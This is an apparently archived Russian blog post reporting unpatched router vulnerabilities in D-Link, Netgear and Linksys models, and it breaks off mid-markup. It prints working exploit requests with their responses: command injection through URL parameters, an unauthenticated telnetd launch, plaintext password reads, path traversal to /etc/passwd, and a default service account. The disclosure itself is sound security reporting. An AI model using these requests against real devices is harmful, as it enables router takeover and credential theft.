{"id":168683,"date":"2013-02-07T21:04:03","date_gmt":"2013-02-07T17:04:03","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=168683"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=168683","title":{"rendered":"<span class=\"post_title\">\u041e\u0447\u0435\u0440\u0435\u0434\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0440\u043e\u0443\u0442\u0435\u0440\u0430\u0445<\/span>"},"content":{"rendered":"<div class=\"content html_format\">   \t\u041f\u043e\u0445\u043e\u0436\u0435, \u043d\u0430\u0447\u0430\u043b\u043e \u0433\u043e\u0434\u0430 \u043d\u0435 \u0437\u0430\u0434\u0430\u043b\u043e\u0441\u044c \u0434\u043b\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u0439 \u0440\u043e\u0443\u0442\u0435\u0440\u043e\u0432. \u0411\u0443\u043a\u0432\u0430\u043b\u044c\u043d\u043e \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u044f \u0441\u043e\u043e\u0431\u0449\u0430\u043b \u043e <a href=\"http:\/\/habrahabr.ru\/post\/168613\/\">\u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0432 \u0440\u043e\u0443\u0442\u0435\u0440\u0430\u0445 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u0439<\/a>, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u043e\u0439 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 UPnP. \u0418 \u0432\u043e\u0442 \u0435\u0449\u0451 \u043e\u0434\u043d\u0430 \u043d\u043e\u0432\u043e\u0441\u0442\u044c \u043d\u0430 \u044d\u0442\u0443 \u0436\u0435 \u0442\u0435\u043c\u0443. \u041d\u0430 \u0441\u0435\u0439 \u0440\u0430\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u043d\u043e \u0440\u0430\u0437\u043d\u044b\u0435. \u0417\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u043e \u043e\u0431\u043e\u0440\u0443\u0434\u043e\u0432\u0430\u043d\u0438\u0435:<\/p>\n<ul>\n<li>D-Link DIR-615, DIR-600 \u0438 DIR-300 (rev B)<\/li>\n<li>Netgear DGN1000B<\/li>\n<li>Cisco Linksys E1500\/E2500<\/li>\n<li>Netgear SPH200D<\/li>\n<\/ul>\n<p>  \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b, \u043d\u043e \u0438\u0445 \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u044f\u0435\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0444\u0430\u043a\u0442\u043e\u0432: \u043e\u0434\u0438\u043d \u0430\u0432\u0442\u043e\u0440 \u0438 \u043d\u0435\u0436\u0435\u043b\u0430\u043d\u0438\u0435 \u0432\u0435\u043d\u0434\u043e\u0440\u0430 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043f\u0430\u0442\u0447 (\u0435\u0441\u043b\u0438 \u0432\u0435\u0440\u0438\u0442\u044c \u0430\u0432\u0442\u043e\u0440\u0443). <a name=\"habracut\"><\/a><\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">D&#39;Link DIR-615<\/b><\/p>\n<div class=\"spoiler_text\">\u0423\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u0435\u0442\u0441\u044f \u0447\u0442\u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432 \u0440\u0435\u0432\u0438\u0437\u0438\u0438 H1, \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0438 \u0432\u0435\u0440\u0441\u0438\u0438 8.04 \u043e\u0442 4 \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u044f 2012 \u0438 8.04 \u043e\u0442 18 \u044f\u043d\u0432\u0430\u0440\u044f 2013. \u041f\u0440\u0430\u0432\u0434\u0430, \u044f \u043d\u0435 \u0441\u043c\u043e\u0433 \u043d\u0430\u0439\u0442\u0438 \u044d\u0442\u0438 \u0432\u0435\u0440\u0441\u0438\u0438 \u043d\u0430 <a href=\"http:\/\/www.dlink.com\/us\/en\/support\/product\/dir-615-wireless-n-300-router?revision=us_reve\">\u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u043c \u0441\u0430\u0439\u0442\u0435 \u0432\u0435\u043d\u0434\u043e\u0440\u0430<\/a>.<\/p>\n<h5>\u0412\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434 \u041e\u0421 \u0440\u043e\u0443\u0442\u0435\u0440\u0430<\/h5>\n<p>  \u0410\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435, \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0432 GET-\u0437\u0430\u043f\u0440\u043e\u0441, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0431\u0443\u0434\u0443\u0442 \u043f\u0435\u0440\u0435\u0434\u0430\u043d\u044b \u0432 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0435 <u>ping_ipaddr<\/u><\/p>\n<p>  \u041f\u0440\u0438\u043c\u0435\u0440:<\/p>\n<pre><code class=\"html\">http:\/\/&lt;IP&gt;\/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr=  http:\/\/&lt;IP&gt;\/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr= <\/code><\/pre>\n<p>  \u043e\u0442\u0432\u0435\u0442 \u043d\u0430 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u043f\u0440\u0438\u0445\u043e\u0434\u0438\u0442 \u0432 \u0442\u0435\u043b\u0435 HTTP-\u043e\u0442\u0432\u0435\u0442\u0430:<\/p>\n<pre><code class=\"html\">HTTP\/1.0 200 OK Pragma: no-cache Content-Type: text\/html  &lt;!DOCTYPE HTML PUBLIC &quot;-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN&quot;&gt; &lt;html&gt; &lt;head&gt; &lt;script type=&quot;text\/javascript&quot; src=&quot;common.js.htm&quot;&gt;&lt;\/script&gt; &lt;script language=&quot;javascript&quot;&gt; CommJs({init:INC_COMM_PAGE,group:PAGE_GROUP_TOOLS}); var pingResult=&quot;Domain&quot;; var pingip=&quot;ipv4_1.1.1.1Linux DIR-615 2.6.21 #2 Fri Jan 18 16:42:24 CST 2013 mips unknown&quot;; &lt;&lt;== var vctinfo= [ {ethport:'0', status:'0', rate:'0', dup:'0'}, {ethport:'1', status:'0', rate:'0', dup:'0'}, {ethport:'2', status:'0', rate:'0', dup:'0'}, <\/code><\/pre>\n<p>  \u041c\u043e\u0436\u0435\u0442, \u043a\u0442\u043e \u0441\u043f\u0440\u043e\u0441\u0438\u0442: \u00ab\u0412 \u0447\u0451\u043c \u0436\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0435\u0441\u043b\u0438 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0442\u043e\u043b\u044c\u043a\u043e \u044d\u0442\u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u00bb? \u041e\u0431\u044a\u044f\u0441\u043d\u044e: \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u0435\u0439 \u0438 \u043a\u0438\u043d\u0443\u0442\u044c \u0432\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u0443 \u0440\u043e\u0443\u0442\u0435\u0440\u0430 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0443\u044e \u0441\u0441\u044b\u043b\u043a\u0443.<\/p>\n<h5>\u0420\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438<\/h5>\n<p>  GET-\u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 \u0430\u0434\u0440\u0435\u0441 \u0432\u0438\u0434\u0430 <\/p>\n<pre><code class=\"html\">http:\/\/IP_\u0440\u043e\u0443\u0442\u0435\u0440\u0430\/gconfig.htm <\/code><\/pre>\n<p>  \u0432\u0435\u0440\u043d\u0451\u0442 \u043d\u0430\u043c:<\/p>\n<pre><code class=\"html\">var ModelName = 'DIR-615'; var systemName='DLINK-DIR615'; var FunctionList = {HAS_PRIORITY_WEB_ACCOUNT:1,PRIORITY_WEB_ACCOUNT_NUM:1,HAS_IPV6_AUTO_CONFIG:1,DHCPD_HAS_OPTION_66:1,SUPPORT_WPS_DISABLE_PINCODE:1,SUPPORT_IPV6_DSLITE:1,HAS_IPV6_6RD:0,NON_USED:0}  <\/code><\/pre>\n<p>  <\/p>\n<h5>\u0418\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u043f\u0430\u0440\u043e\u043b\u044f \u0431\u0435\u0437 \u0432\u0432\u043e\u0434\u0430 \u0441\u0442\u0430\u0440\u043e\u0433\u043e<\/h5>\n<p>  \u0414\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043f\u043e\u0441\u043b\u0430\u0442\u044c GET-\u0437\u0430\u043f\u0440\u043e\u0441 \u0441 \u0442\u0430\u043a\u0438\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u044b\u043c:<\/p>\n<pre><code class=\"html\">http:\/\/IP_\u0440\u043e\u0443\u0442\u0435\u0440\u0430\/tools_admin.htm?page=tools_admin&admin_password1=admin2&admin_password2=admin2&hostname=DIR-615 <\/code><\/pre>\n<p>  \u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u0438 D-Link \u0431\u044b\u043b\u0438 \u043e\u043f\u043e\u0432\u0435\u0449\u0435\u043d\u044b \u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430\u0445 \u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u043d\u043e \u0437\u0430\u044f\u0432\u0438\u043b\u0438, \u0447\u0442\u043e \u0444\u0438\u043a\u0441\u0430 \u043d\u0435 \u0431\u0443\u0434\u0435\u0442, \u0442.\u043a. \u043f\u043e \u0438\u0445 \u043c\u043d\u0435\u043d\u0438\u044e, \u044d\u0442\u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043d\u0435 \u0432 \u0438\u0445 \u043e\u0431\u043e\u0440\u0443\u0434\u043e\u0432\u0430\u043d\u0438\u0438, \u0430 \u0432 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430\u0445 \u0438 \u0441\u0430\u043c\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u0445 \u0438\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432.  <\/div>\n<\/div>\n<div class=\"spoiler\"><b class=\"spoiler_title\">DIR-600 \/ DIR 300 &#8212; HW rev B1<\/b><\/p>\n<div class=\"spoiler_text\">DIR-300 \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0432\u0435\u0440\u0441\u0438\u0438:  <\/p>\n<ul>\n<li>2.12 \u043e\u0442 18.01.2012<\/li>\n<li>2.13 \u043e\u0442 07.11.2012<\/li>\n<\/ul>\n<p>  DIR-600 \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0432\u0435\u0440\u0441\u0438\u0438:  <\/p>\n<ul>\n<li>2.12b02 \u043e\u0442 17\/01\/2012<\/li>\n<li>2.13b01 \u043e\u0442 07\/11\/2012<\/li>\n<li>2.14b01 \u043e\u0442 22\/01\/2013<\/li>\n<\/ul>\n<h5>\u0412\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434 \u041e\u0421 \u0440\u043e\u0443\u0442\u0435\u0440\u0430<\/h5>\n<p>  \u041d\u0435 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435, \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0432 GET-\u0437\u0430\u043f\u0440\u043e\u0441, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0431\u0443\u0434\u0443\u0442 \u043f\u0435\u0440\u0435\u0434\u0430\u043d\u044b \u0432 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0435 <u>cmd<\/u><\/p>\n<p>  <u>\u041f\u0440\u0438\u043c\u0435\u0440 \u2014 \u0437\u0430\u043f\u0443\u0441\u043a \u0441\u0435\u0440\u0432\u0435\u0440\u0430 telnetd<\/u><\/p>\n<pre><code class=\"html\">Request: POST \/command.php HTTP\/1.1 Host: 192.168.178.222 User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko\/20100101 Firefox\/16.0 Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Content-Type: application\/x-www-form-urlencoded; charset=UTF-8 Referer: http:\/\/192.168.178.222\/ Content-Length: 15 Cookie: uid=hfaiGzkB4z Pragma: no-cache Cache-Control: no-cache  cmd=telnetd; <\/code><\/pre>\n<h4>\u041d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0435 \u0445\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0447\u0443\u0432\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438<\/h4>\n<p>  \u041f\u0430\u0440\u043e\u043b\u0438 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435 \u0445\u0440\u0430\u043d\u044f\u0442\u0441\u044f \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435, \u0431\u0435\u0437 \u0445\u0435\u0448\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f:  <\/p>\n<pre><code class=\"bash\"># cat var\/passwd &quot;admin&quot; &quot;test&quot; &quot;0&quot; <\/code><\/pre>\n<p>  \u041f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043f\u0430\u0440\u043e\u043b\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u0432\u043e\u0442 \u0442\u0430\u043a:<\/p>\n<pre><code class=\"bash\">root@bt:~# curl --data &quot;cmd=cat \/var\/passwd&quot; http:\/\/&lt;Target IP&gt;\/command.php &quot;admin&quot; &quot;THESECRETPASS&quot; &quot;0&quot; <\/code><\/pre>\n<h5>\u0420\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438<\/h5>\n<p>  \u0417\u0430\u043f\u0440\u043e\u0441 \u0432\u0438\u0434\u0430:  <\/p>\n<pre><code class=\"html\">http:\/\/Target-IP\/DevInfo.txt <\/code><\/pre>\n<p>  \u0432\u0435\u0440\u043d\u0451\u0442 \u043d\u0430\u043c:<\/p>\n<pre><code class=\"html\">HTTP\/1.1 200 OK Server: Linux, HTTP\/1.1, DIR-600 Ver 2.14 Date: Fri, 31 Dec 1999 18:04:13 GMT Content-Length: 267  Firmware External Version: V2.14 Firmware Internal Version: d1mg Model Name: DIR-600 Hardware Version: Bx WLAN Domain: 826 Kernel: 2.6.33.2 Language: en Graphcal Authentication: Disable LAN MAC: &lt;snip&gt; WAN MAC: &lt;snip&gt; WLAN MAC: &lt;snip&gt;  <\/code><\/pre>\n<p>  \u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u0438 D-Link \u0431\u044b\u043b\u0438 \u043e\u043f\u043e\u0432\u0435\u0449\u0435\u043d\u044b \u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430\u0445 \u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u043d\u043e \u0437\u0430\u044f\u0432\u0438\u043b\u0438, \u0447\u0442\u043e \u0444\u0438\u043a\u0441\u0430 \u043d\u0435 \u0431\u0443\u0434\u0435\u0442, \u0442.\u043a. \u043f\u043e \u0438\u0445 \u043c\u043d\u0435\u043d\u0438\u044e, \u044d\u0442\u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043d\u0435 \u0432 \u0438\u0445 \u043e\u0431\u043e\u0440\u0443\u0434\u043e\u0432\u0430\u043d\u0438\u0438, \u0430 \u0432 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430\u0445 \u0438 \u0441\u0430\u043c\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u0445 \u0438\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432.<\/p><\/div>\n<\/div>\n<div class=\"spoiler\"><b class=\"spoiler_title\">Netgear SPH200D<\/b><\/p>\n<div class=\"spoiler_text\">\u0423\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u043f\u0440\u043e\u0448\u0438\u0432\u043e\u043a:<\/p>\n<p>  Firmware Version: 1.0.4.80<br \/>  Kernel Version: 4.1-18<br \/>  Web Server Version: 1.5  <\/p>\n<h4>\u0427\u0442\u0435\u043d\u0438\u0435 \u0444\u0430\u0439\u043b\u043e\u0432 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435<\/h4>\n<p>  \u0410\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u0447\u0438\u0442\u0430\u0442\u044c \u0444\u0430\u0439\u043b\u044b \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435  <\/p>\n<pre><code class=\"html\">http:\/\/IP_\u0440\u043e\u0443\u0442\u0435\u0440\u0430\/..\/..\/etc\/passwd <\/code><\/pre>\n<p>  \u0432\u0435\u0440\u043d\u0451\u0442 \u043e\u0442\u0432\u0435\u0442 \u0432\u0438\u0434\u0430:  <\/p>\n<pre><code class=\"html\">HTTP\/1.0 200 OK Content-type: text\/plain Expires: Sat, 24 May 1980.7:00:00.GMT Pragma: no-cache Server: simple httpd 1.0  root:x:0:0:root:\/root:\/bin\/bash demo:x:5000:100:Demo User:\/home\/demo:\/bin\/bash nobody:x:65534:65534:Nobody:\/htdocs:\/bin\/bash <\/code><\/pre>\n<p>  \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u043e \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0447\u0442\u0435\u043d\u0438\u0435 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u0432:<\/p>\n<pre><code class=\"html\">\/..\/..\/var\/  HTTP\/1.0 200 OK Content-type: text\/html Expires: Sat, 24 May 1980.7:00:00.GMT Pragma: no-cache Server: simple httpd 1.0  &lt;H1&gt;Index of ..\/..\/var\/&lt;\/H1&gt;  &lt;p&gt;&lt;a href=&quot;\/..\/..\/var\/.&quot;&gt;.&lt;\/a&gt;&lt;\/p&gt; &lt;p&gt;&lt;a href=&quot;\/..\/..\/var\/..&quot;&gt;..&lt;\/a&gt;&lt;\/p&gt; &lt;p&gt;&lt;a href=&quot;\/..\/..\/var\/.Skype&quot;&gt;.Skype&lt;\/a&gt;&lt;\/p&gt; &lt;p&gt;&lt;a href=&quot;\/..\/..\/var\/jffs2&quot;&gt;jffs2&lt;\/a&gt;&lt;\/p&gt; &lt;p&gt;&lt;a href=&quot;\/..\/..\/var\/htdocs&quot;&gt;htdocs&lt;\/a&gt;&lt;\/p&gt; &lt;p&gt;&lt;a href=&quot;\/..\/..\/var\/cnxt&quot;&gt;cnxt&lt;\/a&gt;&lt;\/p&gt; &lt;p&gt;&lt;a href=&quot;\/..\/..\/var\/ppp&quot;&gt;ppp&lt;\/a&gt;&lt;\/p&gt; &lt;p&gt;&lt;a href=&quot;\/..\/..\/var\/conf&quot;&gt;conf&lt;\/a&gt;&lt;\/p&gt; &lt;p&gt;&lt;a href=&quot;\/..\/..\/var\/bin&quot;&gt;bin&lt;\/a&gt;&lt;\/p&gt; &lt;p&gt;&lt;a href=&quot;\/..\/..\/var\/usr&quot;&gt;usr&lt;\/a&gt;&lt;\/p&gt; &lt;p&gt;&lt;a href=&quot;\/..\/..\/var\/tmp&quot;&gt;tmp&lt;\/a&gt;&lt;\/p&gt; <\/code><\/pre>\n<p>  \u041d\u043e \u0442.\u043a. \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0431\u044b\u0442\u044c \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435 \u0438 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043e\u0442\u0432\u0435\u0442 \u043d\u0430 \u0437\u0430\u043f\u0440\u043e\u0441 \u2014 \u043d\u0435 \u0441\u043e\u0432\u0441\u0435\u043c \u044f\u0441\u043d\u043e \u043a\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u044d\u0442\u0438\u043c \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f<\/p>\n<h5>\u041c\u0435\u0436\u0441\u0430\u0439\u0442\u043e\u0432\u044b\u0439 \u0441\u043a\u0440\u0438\u043f\u0442\u0438\u043d\u0433<\/h5>\n<p>  <img decoding=\"async\" src=\"http:\/\/www.s3cur1ty.de\/sites\/www.s3cur1ty.de\/files\/images\/XSSed-IE6.png\" alt=\"image\"\/><\/p>\n<h5>\u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u00ab\u0437\u0430\u0432\u043e\u0434\u0441\u043a\u043e\u0433\u043e\u00bb \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430<\/h5>\n<p>  \u041f\u043e-\u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e, \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0430\u043a\u043a\u0430\u0443\u043d\u0442 \u0441 \u043b\u043e\u0433\u0438\u043d\u043e\u043c: \u043f\u0430\u0440\u043e\u043b\u0435\u043c <b>service:service<\/b>. \u042f \u0442\u0430\u043a \u043f\u043e\u043d\u0438\u043c\u0430\u044e \u043d\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0435\u0433\u043e \u043f\u043e\u043c\u0435\u043d\u044f\u0442\u044c \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u043c\u0438 \u0448\u0442\u0430\u0442\u043d\u044b\u043c\u0438 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430\u043c\u0438.<\/p>\n<p>  \u041f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044c \u0431\u044b\u043b \u0443\u0432\u0435\u0434\u043e\u043c\u043b\u0451\u043d \u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430\u0445 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 2012, \u043d\u043e \u043d\u0435 \u043e\u0442\u0440\u0435\u0430\u0433\u0438\u0440\u043e\u0432\u0430\u043b.<\/p><\/div>\n<\/div>\n<div class=\"spoiler\"><b class=\"spoiler_title\">Linksys E1500\/E2500<\/b><\/p>\n<div class=\"spoiler_text\">\u0423\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u043f\u0440\u043e\u0448\u0438\u0432\u043e\u043a:<br \/>  <b>e1500:<\/b>  <\/p>\n<ul>\n<li>v1.0.00 \u2014 build 9 -\u0444\u0435\u0432\u0440\u0430\u043b\u044c 17, 2011<\/li>\n<li>v1.0.04 \u2014 build 2 \u2014 \u043c\u0430\u0440\u0442 8, 2012<\/li>\n<li>v1.0.05 \u2014 build 1 \u2014 \u0430\u0432\u0433\u0443\u0441\u0442 23, 2012<\/li>\n<\/ul>\n<p>  <b>e2500<\/b>  <\/p>\n<ul>\n<li> v1.0.03<\/li>\n<\/ul>\n<h5>\u0412\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434 \u041e\u0421 \u0440\u043e\u0443\u0442\u0435\u0440\u0430<\/h5>\n<p>  \u0410\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435, \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0432 GET-\u0437\u0430\u043f\u0440\u043e\u0441, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0431\u0443\u0434\u0443\u0442 \u043f\u0435\u0440\u0435\u0434\u0430\u043d\u044b \u0432 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0435 <u>ping_size<\/u><\/p>\n<p>  \u041f\u0440\u0438\u043c\u0435\u0440:  <\/p>\n<pre><code 